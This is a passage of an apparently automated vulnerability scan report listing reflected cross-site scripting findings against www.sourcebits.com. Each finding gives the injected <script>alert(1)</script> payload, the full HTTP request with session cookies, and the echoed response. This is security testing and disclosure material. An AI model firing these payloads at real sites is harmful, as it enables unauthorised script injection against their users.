The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5177<script>alert(1)</script>0074e58a298 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssa5177<script>alert(1)</script>0074e58a298/main.css?1292324578 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/cssa5177<script>alert(1)</script>0074e58a298/main.css?1292324578</h2>
...[SNIP]...

1.43. http://www.sourcebits.com/css/main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6daf4<script>alert(1)</script>f290d15328 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.css6daf4<script>alert(1)</script>f290d15328?1292324578 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/main.css6daf4<script>alert(1)</script>f290d15328?1292324578</h2>
...[SNIP]...

1.44. http://www.sourcebits.com/css/main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389ac"><script>alert(1)</script>b7a4d04568a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/main.css389ac"><script>alert(1)</script>b7a4d04568a?1292324578 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/main.css389ac"><script>alert(1)</script>b7a4d04568a?1292324578" />
...[SNIP]...

1.45. http://www.sourcebits.com/css/project.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/project.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dfe4d<script>alert(1)</script>e6dd21202cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssdfe4d<script>alert(1)</script>e6dd21202cb/project.css?1293452362 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/cssdfe4d<script>alert(1)</script>e6dd21202cb/project.css?1293452362</h2>
...[SNIP]...

1.46. http://www.sourcebits.com/css/project.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/project.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c316"><script>alert(1)</script>d0be277839e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css6c316"><script>alert(1)</script>d0be277839e/project.css?1293452362 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css6c316"><script>alert(1)</script>d0be277839e/project.css?1293452362" />
...[SNIP]...

1.47. http://www.sourcebits.com/css/project.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/project.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8221e<script>alert(1)</script>87f01210c4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/project.css8221e<script>alert(1)</script>87f01210c4f?1293452362 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:27 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/project.css8221e<script>alert(1)</script>87f01210c4f?1293452362</h2>
...[SNIP]...

1.48. http://www.sourcebits.com/css/project.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/project.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2426"><script>alert(1)</script>4e9efdf4dbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/project.cssd2426"><script>alert(1)</script>4e9efdf4dbe?1293452362 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/project.cssd2426"><script>alert(1)</script>4e9efdf4dbe?1293452362" />
...[SNIP]...

1.49. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/sb_announce.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload edc54<script>alert(1)</script>ce6c2029740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssedc54<script>alert(1)</script>ce6c2029740/sb_announce.css?1305558372 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/cssedc54<script>alert(1)</script>ce6c2029740/sb_announce.css?1305558372</h2>
...[SNIP]...

1.50. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/sb_announce.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a59"><script>alert(1)</script>89d15ce5c0f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css86a59"><script>alert(1)</script>89d15ce5c0f/sb_announce.css?1305558372 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css86a59"><script>alert(1)</script>89d15ce5c0f/sb_announce.css?1305558372" />
...[SNIP]...

1.51. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/sb_announce.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a46b"><script>alert(1)</script>337df9fc360 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/sb_announce.css3a46b"><script>alert(1)</script>337df9fc360?1305558372 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/sb_announce.css3a46b"><script>alert(1)</script>337df9fc360?1305558372" />
...[SNIP]...

1.52. http://www.sourcebits.com/css/sb_announce.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/sb_announce.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23229<script>alert(1)</script>d777599492e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/sb_announce.css23229<script>alert(1)</script>d777599492e?1305558372 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/sb_announce.css23229<script>alert(1)</script>d777599492e?1305558372</h2>
...[SNIP]...

1.53. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/services-leftnav.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45a24"><script>alert(1)</script>b435f257b4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css45a24"><script>alert(1)</script>b435f257b4e/services-leftnav.css?1292234334 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css45a24"><script>alert(1)</script>b435f257b4e/services-leftnav.css?1292234334" />
...[SNIP]...

1.54. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/services-leftnav.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 593c3<script>alert(1)</script>8e9b69def33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css593c3<script>alert(1)</script>8e9b69def33/services-leftnav.css?1292234334 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:06 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css593c3<script>alert(1)</script>8e9b69def33/services-leftnav.css?1292234334</h2>
...[SNIP]...

1.55. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/services-leftnav.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b7f"><script>alert(1)</script>f213bfa75bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/services-leftnav.css63b7f"><script>alert(1)</script>f213bfa75bf?1292234334 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/services-leftnav.css63b7f"><script>alert(1)</script>f213bfa75bf?1292234334" />
...[SNIP]...

1.56. http://www.sourcebits.com/css/services-leftnav.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/css/services-leftnav.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99721<script>alert(1)</script>a76a71cf63c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/services-leftnav.css99721<script>alert(1)</script>a76a71cf63c?1292234334 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:18 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/services-leftnav.css99721<script>alert(1)</script>a76a71cf63c?1292234334</h2>
...[SNIP]...

1.57. http://www.sourcebits.com/design [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sourcebits.com
Path:	/design

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5136e<script>alert(1)</script>563db75cdd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

